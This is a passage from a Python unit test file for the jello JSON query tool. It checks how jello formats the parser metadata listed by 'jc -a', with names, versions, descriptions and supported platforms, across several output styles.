"argument": "--who",
"version": "1.0",
"description": "who command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"who"
]
},
{
"name": "xml",
"argument": "--xml",
"version": "1.0",
"description": "XML file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the xmltodict library at https://github.com/martinblech/xmltodict",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "yaml",
"argument": "--yaml",
"version": "1.0",
"description": "YAML file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
}
]
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_["parsers"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s_parsers_dot(self):
"""
Test jc -a | jello -s '_.parsers'
"""
self.expected = '''\
.[0].name = "airport";
.[0].argument = "--airport";
.[0].version = "1.0";
.[0].description = "airport -I command parser";
.[0].author = "Kelly Brazil";
.[0].author_email = "kellyjonbrazil@gmail.com";
.[0].compatible[0] = "darwin";
.[0].magic_commands[0] = "airport -I";
.[1].name = "airport_s";
.[1].argument = "--airport-s";
.[1].version = "1.0";
.[1].description = "airport -s command parser";
.[1].author = "Kelly Brazil";
.[1].author_email = "kellyjonbrazil@gmail.com";
.[1].compatible[0] = "darwin";
.[1].magic_commands[0] = "airport -s";
.[2].name = "arp";
.[2].argument = "--arp";
.[2].version = "1.2";
.[2].description = "arp command parser";
.[2].author = "Kelly Brazil";
.[2].author_email = "kellyjonbrazil@gmail.com";
.[2].compatible[0] = "linux";
.[2].compatible[1] = "aix";
.[2].compatible[2] = "freebsd";
.[2].compatible[3] = "darwin";
.[2].magic_commands[0] = "arp";
.[3].name = "blkid";
.[3].argument = "--blkid";
.[3].version = "1.0";
.[3].description = "blkid command parser";
.[3].author = "Kelly Brazil";
.[3].author_email = "kellyjonbrazil@gmail.com";
.[3].compatible[0] = "linux";
.[3].magic_commands[0] = "blkid";
.[4].name = "crontab";
.[4].argument = "--crontab";
.[4].version = "1.1";
.[4].description = "crontab command and file parser";
.[4].author = "Kelly Brazil";
.[4].author_email = "kellyjonbrazil@gmail.com";
.[4].compatible[0] = "linux";
.[4].compatible[1] = "darwin";
.[4].compatible[2] = "aix";
.[4].compatible[3] = "freebsd";
.[4].magic_commands[0] = "crontab";
.[5].name = "crontab_u";
.[5].argument = "--crontab-u";
.[5].version = "1.0";
.[5].description = "crontab file parser with user support";
.[5].author = "Kelly Brazil";
.[5].author_email = "kellyjonbrazil@gmail.com";
.[5].compatible[0] = "linux";
.[5].compatible[1] = "darwin";
.[5].compatible[2] = "aix";
.[5].compatible[3] = "freebsd";
.[6].name = "csv";
.[6].argument = "--csv";
.[6].version = "1.0";
.[6].description = "CSV file parser";
.[6].author = "Kelly Brazil";
.[6].author_email = "kellyjonbrazil@gmail.com";
.[6].details = "Using the python standard csv library";
.[6].compatible[0] = "linux";
.[6].compatible[1] = "darwin";
.[6].compatible[2] = "cygwin";
.[6].compatible[3] = "win32";
.[6].compatible[4] = "aix";
.[6].compatible[5] = "freebsd";
.[7].name = "df";
.[7].argument = "--df";
.[7].version = "1.1";
.[7].description = "df command parser";
.[7].author = "Kelly Brazil";
.[7].author_email = "kellyjonbrazil@gmail.com";
.[7].compatible[0] = "linux";
.[7].compatible[1] = "darwin";
.[7].magic_commands[0] = "df";
.[8].name = "dig";
.[8].argument = "--dig";
.[8].version = "1.1";
.[8].description = "dig command parser";
.[8].author = "Kelly Brazil";
.[8].author_email = "kellyjonbrazil@gmail.com";
.[8].compatible[0] = "linux";
.[8].compatible[1] = "aix";
.[8].compatible[2] = "freebsd";
.[8].compatible[3] = "darwin";
.[8].magic_commands[0] = "dig";
.[9].name = "du";
.[9].argument = "--du";
.[9].version = "1.1";
.[9].description = "du command parser";
.[9].author = "Kelly Brazil";
.[9].author_email = "kellyjonbrazil@gmail.com";
.[9].compatible[0] = "linux";
.[9].compatible[1] = "darwin";
.[9].compatible[2] = "aix";
.[9].compatible[3] = "freebsd";
.[9].magic_commands[0] = "du";
.[10].name = "env";
.[10].argument = "--env";
.[10].version = "1.1";
.[10].description = "env command parser";
.[10].author = "Kelly Brazil";
.[10].author_email = "kellyjonbrazil@gmail.com";
.[10].compatible[0] = "linux";
.[10].compatible[1] = "darwin";
.[10].compatible[2] = "cygwin";
.[10].compatible[3] = "win32";
.[10].compatible[4] = "aix";
.[10].compatible[5] = "freebsd";
.[10].magic_commands[0] = "env";
.[11].name = "file";
.[11].argument = "--file";
.[11].version = "1.1";
.[11].description = "file command parser";
.[11].author = "Kelly Brazil";
.[11].author_email = "kellyjonbrazil@gmail.com";
.[11].compatible[0] = "linux";
.[11].compatible[1] = "aix";
.[11].compatible[2] = "freebsd";
.[11].compatible[3] = "darwin";
.[11].magic_commands[0] = "file";
.[12].name = "free";
.[12].argument = "--free";
.[12].version = "1.0";
.[12].description = "free command parser";
.[12].author = "Kelly Brazil";
.[12].author_email = "kellyjonbrazil@gmail.com";
.[12].compatible[0] = "linux";
.[12].magic_commands[0] = "free";
.[13].name = "fstab";
.[13].argument = "--fstab";
.[13].version = "1.0";
.[13].description = "fstab file parser";
.[13].author = "Kelly Brazil";
.[13].author_email = "kellyjonbrazil@gmail.com";
.[13].compatible[0] = "linux";
.[14].name = "group";
.[14].argument = "--group";
.[14].version = "1.0";
.[14].description = "/etc/group file parser";
.[14].author = "Kelly Brazil";
.[14].author_email = "kellyjonbrazil@gmail.com";
.[14].compatible[0] = "linux";
.[14].compatible[1] = "darwin";
.[14].compatible[2] = "aix";
.[14].compatible[3] = "freebsd";
.[15].name = "gshadow";
.[15].argument = "--gshadow";
.[15].version = "1.0";
.[15].description = "/etc/gshadow file parser";
.[15].author = "Kelly Brazil";
.[15].author_email = "kellyjonbrazil@gmail.com";
.[15].compatible[0] = "linux";
.[15].compatible[1] = "aix";
.[15].compatible[2] = "freebsd";
.[16].name = "history";
.[16].argument = "--history";
.[16].version = "1.2";
.[16].description = "history command parser";
.[16].author = "Kelly Brazil";
.[16].author_email = "kellyjonbrazil@gmail.com";
.[16].details = "Optimizations by https://github.com/philippeitis";
.[16].compatible[0] = "linux";
.[16].compatible[1] = "darwin";
.[16].compatible[2] = "cygwin";
.[16].compatible[3] = "aix";
.[16].compatible[4] = "freebsd";
.[17].name = "hosts";
.[17].argument = "--hosts";
.[17].version = "1.0";
.[17].description = "/etc/hosts file parser";
.[17].author = "Kelly Brazil";
.[17].author_email = "kellyjonbrazil@gmail.com";
.[17].compatible[0] = "linux";
.[17].compatible[1] = "darwin";
.[17].compatible[2] = "cygwin";
.[17].compatible[3] = "win32";
.[17].compatible[4] = "aix";
.[17].compatible[5] = "freebsd";
.[18].name = "id";
.[18].argument = "--id";
.[18].version = "1.0";
.[18].description = "id command parser";
.[18].author = "Kelly Brazil";
.[18].author_email = "kellyjonbrazil@gmail.com";
.[18].compatible[0] = "linux";
.[18].compatible[1] = "darwin";
.[18].compatible[2] = "aix";
.[18].compatible[3] = "freebsd";
.[18].magic_commands[0] = "id";
.[19].name = "ifconfig";
.[19].argument = "--ifconfig";
.[19].version = "1.5";
.[19].description = "ifconfig command parser";
.[19].author = "Kelly Brazil";
.[19].author_email = "kellyjonbrazil@gmail.com";
.[19].details = "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser";
.[19].compatible[0] = "linux";
.[19].compatible[1] = "aix";
.[19].compatible[2] = "freebsd";
.[19].compatible[3] = "darwin";
.[19].magic_commands[0] = "ifconfig";
.[20].name = "ini";
.[20].argument = "--ini";
.[20].version = "1.0";
.[20].description = "INI file parser";
.[20].author = "Kelly Brazil";
.[20].author_email = "kellyjonbrazil@gmail.com";
.[20].details = "Using configparser from the standard library";
.[20].compatible[0] = "linux";
.[20].compatible[1] = "darwin";
.[20].compatible[2] = "cygwin";
.[20].compatible[3] = "win32";
.[20].compatible[4] = "aix";
.[20].compatible[5] = "freebsd";
.[21].name = "iptables";
.[21].argument = "--iptables";
.[21].version = "1.1";
.[21].description = "iptables command parser";
.[21].author = "Kelly Brazil";
.[21].author_email = "kellyjonbrazil@gmail.com";
.[21].compatible[0] = "linux";
.[21].magic_commands[0] = "iptables";
.[22].name = "jobs";
.[22].argument = "--jobs";
.[22].version = "1.0";
.[22].description = "jobs command parser";
.[22].author = "Kelly Brazil";
.[22].author_email = "kellyjonbrazil@gmail.com";
.[22].compatible[0] = "linux";
.[22].compatible[1] = "darwin";
.[22].compatible[2] = "cygwin";
.[22].compatible[3] = "aix";
.[22].compatible[4] = "freebsd";
.[22].magic_commands[0] = "jobs";
.[23].name = "last";
.[23].argument = "--last";
.[23].version = "1.0";
.[23].description = "last and lastb command parser";
.[23].author = "Kelly Brazil";
.[23].author_email = "kellyjonbrazil@gmail.com";
.[23].compatible[0] = "linux";
.[23].compatible[1] = "darwin";
.[23].compatible[2] = "aix";
.[23].compatible[3] = "freebsd";
.[23].magic_commands[0] = "last";
.[23].magic_commands[1] = "lastb";
.[24].name = "ls";
.[24].argument = "--ls";
.[24].version = "1.3";
.[24].description = "ls command parser";
.[24].author = "Kelly Brazil";
.[24].author_email = "kellyjonbrazil@gmail.com";
.[24].compatible[0] = "linux";
.[24].compatible[1] = "darwin";
.[24].compatible[2] = "cygwin";
.[24].compatible[3] = "aix";
.[24].compatible[4] = "freebsd";
.[24].magic_commands[0] = "ls";
.[25].name = "lsblk";
.[25].argument = "--lsblk";
.[25].version = "1.3";
.[25].description = "lsblk command parser";
.[25].author = "Kelly Brazil";
.[25].author_email = "kellyjonbrazil@gmail.com";
.[25].compatible[0] = "linux";
.[25].magic_commands[0] = "lsblk";
.[26].name = "lsmod";
.[26].argument = "--lsmod";
.[26].version = "1.1";
.[26].description = "lsmod command parser";
.[26].author = "Kelly Brazil";
.[26].author_email = "kellyjonbrazil@gmail.com";
.[26].compatible[0] = "linux";
.[26].magic_commands[0] = "lsmod";
.[27].name = "lsof";
.[27].argument = "--lsof";
.[27].version = "1.0";
.[27].description = "lsof command parser";
.[27].author = "Kelly Brazil";
.[27].author_email = "kellyjonbrazil@gmail.com";
.[27].compatible[0] = "linux";
.[27].magic_commands[0] = "lsof";
.[28].name = "mount";
.[28].argument = "--mount";
.[28].version = "1.1";
.[28].description = "mount command parser";
.[28].author = "Kelly Brazil";
.[28].author_email = "kellyjonbrazil@gmail.com";
.[28].compatible[0] = "linux";
.[28].compatible[1] = "darwin";
.[28].magic_commands[0] = "mount";
.[29].name = "netstat";
.[29].argument = "--netstat";
.[29].version = "1.2";
.[29].description = "netstat command parser";
.[29].author = "Kelly Brazil";
.[29].author_email = "kellyjonbrazil@gmail.com";
.[29].compatible[0] = "linux";
.[29].magic_commands[0] = "netstat";
.[30].name = "ntpq";
.[30].argument = "--ntpq";
.[30].version = "1.0";
.[30].description = "ntpq -p command parser";
.[30].author = "Kelly Brazil";
.[30].author_email = "kellyjonbrazil@gmail.com";
.[30].compatible[0] = "linux";
.[30].magic_commands[0] = "ntpq";
.[31].name = "passwd";
.[31].argument = "--passwd";
.[31].version = "1.0";
.[31].description = "/etc/passwd file parser";
.[31].author = "Kelly Brazil";
.[31].author_email = "kellyjonbrazil@gmail.com";
.[31].compatible[0] = "linux";
.[31].compatible[1] = "darwin";
.[31].compatible[2] = "aix";
.[31].compatible[3] = "freebsd";
.[32].name = "pip_list";
.[32].argument = "--pip-list";
.[32].version = "1.0";
.[32].description = "pip list command parser";
.[32].author = "Kelly Brazil";
.[32].author_email = "kellyjonbrazil@gmail.com";
.[32].compatible[0] = "linux";
.[32].compatible[1] = "darwin";
.[32].compatible[2] = "cygwin";
.[32].compatible[3] = "win32";
.[32].compatible[4] = "aix";
.[32].compatible[5] = "freebsd";
.[32].magic_commands[0] = "pip list";
.[32].magic_commands[1] = "pip3 list";
.[33].name = "pip_show";
.[33].argument = "--pip-show";
.[33].version = "1.0";
.[33].description = "pip show command parser";
.[33].author = "Kelly Brazil";
.[33].author_email = "kellyjonbrazil@gmail.com";
.[33].compatible[0] = "linux";
.[33].compatible[1] = "darwin";
.[33].compatible[2] = "cygwin";
.[33].compatible[3] = "win32";
.[33].compatible[4] = "aix";
.[33].compatible[5] = "freebsd";
.[33].magic_commands[0] = "pip show";
.[33].magic_commands[1] = "pip3 show";
.[34].name = "ps";
.[34].argument = "--ps";
.[34].version = "1.1";
.[34].description = "ps command parser";
.[34].author = "Kelly Brazil";
.[34].author_email = "kellyjonbrazil@gmail.com";
.[34].compatible[0] = "linux";
.[34].compatible[1] = "darwin";
.[34].compatible[2] = "cygwin";
.[34].compatible[3] = "aix";
.[34].compatible[4] = "freebsd";
.[34].magic_commands[0] = "ps";
.[35].name = "route";
.[35].argument = "--route";
.[35].version = "1.0";
.[35].description = "route command parser";
.[35].author = "Kelly Brazil";
.[35].author_email = "kellyjonbrazil@gmail.com";
.[35].compatible[0] = "linux";
.[35].magic_commands[0] = "route";
.[36].name = "shadow";
.[36].argument = "--shadow";
.[36].version = "1.0";
.[36].description = "/etc/shadow file parser";
.[36].author = "Kelly Brazil";
.[36].author_email = "kellyjonbrazil@gmail.com";
.[36].compatible[0] = "linux";
.[36].compatible[1] = "darwin";
.[36].compatible[2] = "aix";
.[36].compatible[3] = "freebsd";
.[37].name = "ss";
.[37].argument = "--ss";
.[37].version = "1.0";
.[37].description = "ss command parser";
.[37].author = "Kelly Brazil";
.[37].author_email = "kellyjonbrazil@gmail.com";
.[37].compatible[0] = "linux";
.[37].magic_commands[0] = "ss";
.[38].name = "stat";
.[38].argument = "--stat";
.[38].version = "1.0";
.[38].description = "stat command parser";
.[38].author = "Kelly Brazil";
.[38].author_email = "kellyjonbrazil@gmail.com";
.[38].compatible[0] = "linux";
.[38].magic_commands[0] = "stat";
.[39].name = "systemctl";
.[39].argument = "--systemctl";
.[39].version = "1.0";
.[39].description = "systemctl command parser";
.[39].author = "Kelly Brazil";
.[39].author_email = "kellyjonbrazil@gmail.com";
.[39].compatible[0] = "linux";
.[39].magic_commands[0] = "systemctl";
.[40].name = "systemctl_lj";
.[40].argument = "--systemctl-lj";
.[40].version = "1.0";
.[40].description = "systemctl list-jobs command parser";
.[40].author = "Kelly Brazil";
.[40].author_email = "kellyjonbrazil@gmail.com";
.[40].compatible[0] = "linux";
.[40].magic_commands[0] = "systemctl list-jobs";
.[41].name = "systemctl_ls";
.[41].argument = "--systemctl-ls";
.[41].version = "1.0";
.[41].description = "systemctl list-sockets command parser";
.[41].author = "Kelly Brazil";
.[41].author_email = "kellyjonbrazil@gmail.com";
.[41].compatible[0] = "linux";
.[41].magic_commands[0] = "systemctl list-sockets";
.[42].name = "systemctl_luf";
.[42].argument = "--systemctl-luf";
.[42].version = "1.0";
.[42].description = "systemctl list-unit-files command parser";
.[42].author = "Kelly Brazil";
.[42].author_email = "kellyjonbrazil@gmail.com";
.[42].compatible[0] = "linux";
.[42].magic_commands[0] = "systemctl list-unit-files";
.[43].name = "timedatectl";
.[43].argument = "--timedatectl";
.[43].version = "1.0";
.[43].description = "timedatectl status command parser";
.[43].author = "Kelly Brazil";
.[43].author_email = "kellyjonbrazil@gmail.com";
.[43].compatible[0] = "linux";
.[43].magic_commands[0] = "timedatectl";
.[43].magic_commands[1] = "timedatectl status";
.[44].name = "uname";
.[44].argument = "--uname";
.[44].version = "1.1";
.[44].description = "uname -a command parser";
.[44].author = "Kelly Brazil";
.[44].author_email = "kellyjonbrazil@gmail.com";
.[44].compatible[0] = "linux";
.[44].compatible[1] = "darwin";
.[44].magic_commands[0] = "uname";
.[45].name = "uptime";
.[45].argument = "--uptime";
.[45].version = "1.0";
.[45].description = "uptime command parser";
.[45].author = "Kelly Brazil";
.[45].author_email = "kellyjonbrazil@gmail.com";
.[45].compatible[0] = "linux";
.[45].compatible[1] = "darwin";
.[45].compatible[2] = "cygwin";
.[45].compatible[3] = "aix";
.[45].compatible[4] = "freebsd";
.[45].magic_commands[0] = "uptime";
.[46].name = "w";
.[46].argument = "--w";
.[46].version = "1.0";
.[46].description = "w command parser";
.[46].author = "Kelly Brazil";
.[46].author_email = "kellyjonbrazil@gmail.com";
.[46].compatible[0] = "linux";
.[46].compatible[1] = "darwin";
.[46].compatible[2] = "cygwin";
.[46].compatible[3] = "aix";
.[46].compatible[4] = "freebsd";
.[46].magic_commands[0] = "w";
.[47].name = "who";
.[47].argument = "--who";
.[47].version = "1.0";
.[47].description = "who command parser";
.[47].author = "Kelly Brazil";
.[47].author_email = "kellyjonbrazil@gmail.com";
.[47].compatible[0] = "linux";
.[47].compatible[1] = "darwin";
.[47].compatible[2] = "cygwin";
.[47].compatible[3] = "aix";
.[47].compatible[4] = "freebsd";
.[47].magic_commands[0] = "who";
.[48].name = "xml";
.[48].argument = "--xml";
.[48].version = "1.0";
.[48].description = "XML file parser";
.[48].author = "Kelly Brazil";
.[48].author_email = "kellyjonbrazil@gmail.com";
.[48].details = "Using the xmltodict library at https://github.com/martinblech/xmltodict";
.[48].compatible[0] = "linux";
.[48].compatible[1] = "darwin";
.[48].compatible[2] = "cygwin";
.[48].compatible[3] = "win32";
.[48].compatible[4] = "aix";
.[48].compatible[5] = "freebsd";
.[49].name = "yaml";
.[49].argument = "--yaml";
.[49].version = "1.0";
.[49].description = "YAML file parser";
.[49].author = "Kelly Brazil";
.[49].author_email = "kellyjonbrazil@gmail.com";
.[49].details = "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml";
.[49].compatible[0] = "linux";
.[49].compatible[1] = "darwin";
.[49].compatible[2] = "cygwin";
.[49].compatible[3] = "win32";
.[49].compatible[4] = "aix";
.[49].compatible[5] = "freebsd";
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s', '_.parsers']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_parsers(self):
"""
Test jc -a | jello -c '_["parsers"]'
"""
self.expected = '''[{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]},{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]},{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]},{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]},{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]},{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]},{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]},{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]},{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]},{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]},{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]},{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]},{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]},{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]},{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]},{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]},{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]},{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]},{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]},{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]},{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]},{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]},{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]},{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]},{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]},{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]},{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]},{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]},{"name":"ps","argument":"--ps","version":"1.1","description":"ps command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]},{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]},{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]},{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]},{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]},{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]},{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]},{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-unit-files"]},{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]},{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]},{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]},{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]},{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]},{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}]
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '_["parsers"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_parsers_dot(self):
"""
Test jc -a | jello -c _.parsers
"""
self.expected = '''[{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]},{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]},{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]},{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]},{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]},{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly 